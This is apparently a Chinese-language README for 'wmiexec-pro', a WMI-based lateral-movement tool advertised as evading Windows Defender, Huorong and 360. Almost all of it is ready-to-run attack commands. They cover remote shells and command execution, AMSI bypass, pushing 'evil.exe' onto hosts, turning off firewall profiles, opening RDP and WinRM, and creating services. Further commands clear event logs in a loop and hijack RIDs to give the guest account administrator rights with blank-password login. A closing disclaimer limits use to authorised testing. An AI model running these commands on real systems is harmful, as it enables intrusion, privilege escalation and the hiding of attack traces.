项目介绍
新一代wmiexec.py且具备更多新特性,整个操作只与端口135(不需要smb连接)一起工作,用于横向移动中的AV闪避(Windows Defender,火绒,360)
项目特点
项目使用
python3 wmiexec-pro.py [[domain/]username[:password]@]<targetName or address> module -h
Basic enumeration:
python3 wmiexec-pro.py administrator:password@192.168.1.1 enum -run
Enable/disable amsi bypass:
python3 wmiexec-pro.py administrator:password@192.168.1.1 amsi -enable
python3 wmiexec-pro.py administrator:password@192.168.1.1 amsi -disable
Execute command:
python3 wmiexec-pro.py administrator:password@192.168.1.1 exec-command -shell (Launch a semi-interactive shell)
python3 wmiexec-pro.py administrator:password@192.168.1.1 exec-command -command "whoami" (Default is with output mode)
python3 wmiexec-pro.py administrator:password@192.168.1.1 exec-command -command "whoami" -silent (Silent mode)
python3 wmiexec-pro.py administrator:password@192.168.1.1 exec-command -command "whoami" -silent -old (Slient mode in old version OS, such as server 2003)
python3 wmiexec-pro.py administrator:password@192.168.1.1 exec-command -command "whoami" -old (With output in old version OS, such as server 2003)
python3 wmiexec-pro.py administrator:password@192.168.1.1 exec-command -command "whoami" -save (With output and save output to file)
python3 wmiexec-pro.py administrator:password@192.168.1.1 exec-command -command "whoami" -old -save
python3 wmiexec-pro.py administrator:password@192.168.1.1 exec-command -clear (Remove temporary class for command result storage)
Filetransfer:
python3 wmiexec-pro.py administrator:password@192.168.1.1 filetransfer -upload -src-file "./evil.exe" -dest-file "C:\windows\temp\evil.exe" (Upload file over 512KB)
python3 wmiexec-pro.py administrator:password@192.168.1.1 filetransfer -download -src-file "C:\windows\temp\evil.exe" -dest-file "/tmp/evil.exe" (Download file over 512KB)
python3 wmiexec-pro.py administrator:password@192.168.1.1 filetransfer -clear (Remove temporary class for file transfer)
RDP:
python3 wmiexec-pro.py administrator:password@192.168.1.1 rdp -enable (Auto configure firewall)
python3 wmiexec-pro.py administrator:password@192.168.1.1 rdp -enable -old (For old version OS, such as server 2003)
python3 wmiexec-pro.py administrator:password@192.168.1.1 rdp -enable-ram (Enable Restricted Admin Mode for PTH, not support old version OS, such as server 2003)
python3 wmiexec-pro.py administrator:password@192.168.1.1 rdp -disable
python3 wmiexec-pro.py administrator:password@192.168.1.1 rdp -disable -old (For old version OS, such as server 2003, not support old version OS, such as server 2003)
python3 wmiexec-pro.py administrator:password@192.168.1.1 rdp -disable-ram (Disable Restricted Admin Mode)
WinRM (Only support win7+):
python3 wmiexec-pro.py administrator:password@192.168.1.1 winrm -enable
python3 wmiexec-pro.py administrator:password@192.168.1.1 winrm -disable
Firewall (Only support win8+):
python3 wmiexec-pro.py administrator:password@192.168.1.1 firewall -search-port 445
python3 wmiexec-pro.py administrator:password@192.168.1.1 firewall -dump (Dump all firewall rules)
python3 wmiexec-pro.py administrator:password@192.168.1.1 firewall -rule-id (ID from search port) -action [enable/disable/remove] (enable, disable, remove specify rule)
python3 wmiexec-pro.py administrator:password@192.168.1.1 firewall -firewall-profile enable (Enable all firewall profiles)
python3 wmiexec-pro.py administrator:password@192.168.1.1 firewall -firewall-profile disable (Disable all firewall profiles)
Services:
python3 wmiexec-pro.py administrator:password@192.168.1.1 service -action create -service-name "test" -display-name "For test" -bin-path 'C:\windows\system32\calc.exe'
python3 wmiexec-pro.py administrator:password@192.168.1.1 service -action create -service-name "test" -display-name "For test" -bin-path 'C:\windows\system32\calc.exe' -class "Win32_TerminalService" (Create service via alternative class)
python3 wmiexec-pro.py administrator:password@192.168.1.1 service -action start -service-name "test"
python3 wmiexec-pro.py administrator:password@192.168.1.1 service -action stop -service-name "test"
python3 wmiexec-pro.py administrator:password@192.168.1.1 service -action disable -service-name "test"
python3 wmiexec-pro.py administrator:password@192.168.1.1 service -action auto-start -service-name "test"
python3 wmiexec-pro.py administrator:password@192.168.1.1 service -action manual-start -service-name "test"
python3 wmiexec-pro.py administrator:password@192.168.1.1 service -action getinfo -service-name "test"
python3 wmiexec-pro.py administrator:password@192.168.1.1 service -action delete -service-name "test"
python3 wmiexec-pro.py administrator:password@192.168.1.1 service -dump all-services.json
Eventlog:
python3 wmiexec-pro.py administrator:password@192.168.1.1 eventlog -risk-i-know (Looping cleaning eventlog)
python3 wmiexec-pro.py administrator:password@192.168.1.1 eventlog -retrive object-ID (Stop looping cleaning eventlog)
RID Hijack:
python3 wmiexec-pro.py administrator:password@192.168.1.1 rid-hijack -user 501 -action grant (Grant access permissions for SAM/SAM subkey in registry)
python3 wmiexec-pro.py administrator:password@192.168.1.1 rid-hijack -user 501 -action grant-old (For old version OS, such as server 2003)
python3 wmiexec-pro.py administrator:password@192.168.1.1 rid-hijack -user 501 -action activate (Activate user)
python3 wmiexec-pro.py administrator:password@192.168.1.1 rid-hijack -user 501 -action deactivate (Deactivate user)
python3 wmiexec-pro.py administrator:password@192.168.1.1 rid-hijack -user 501 -action hijack -user 501 -hijack-rid 500 (Hijack guest user rid 501 to administrator rid 500)
python3 wmiexec-pro.py administrator:password@192.168.1.1 rid-hijack -blank-pass-login enable (Enable blank password login)
python3 wmiexec-pro.py administrator:password@192.168.1.1 rid-hijack -blank-pass-login disable
python3 wmiexec-pro.py administrator:password@192.168.1.1 rid-hijack -user 500 -action backup (This will save user profile data as json file)
python3 wmiexec-pro.py guest@192.168.1.1 -no-pass rid-hijack -user 500 -remove (Use guest user remove administrator user profile after rid hijacked)
python3 wmiexec-pro.py guest@192.168.1.1 -no-pass rid-hijack -restore "backup.json" (Restore user profile for target user)
帮助信息:
命令执行:
文件传输:
工作机制
免责声明
仅限用于技术研究和获得正式授权的攻防项目,请使用者遵守《中华人民共和国网络安全法》,切勿用于任何非法活动,若将工具做其他用途,由使用者承担全部法律及连带责任,作者及发布者不承担任何法律连带责任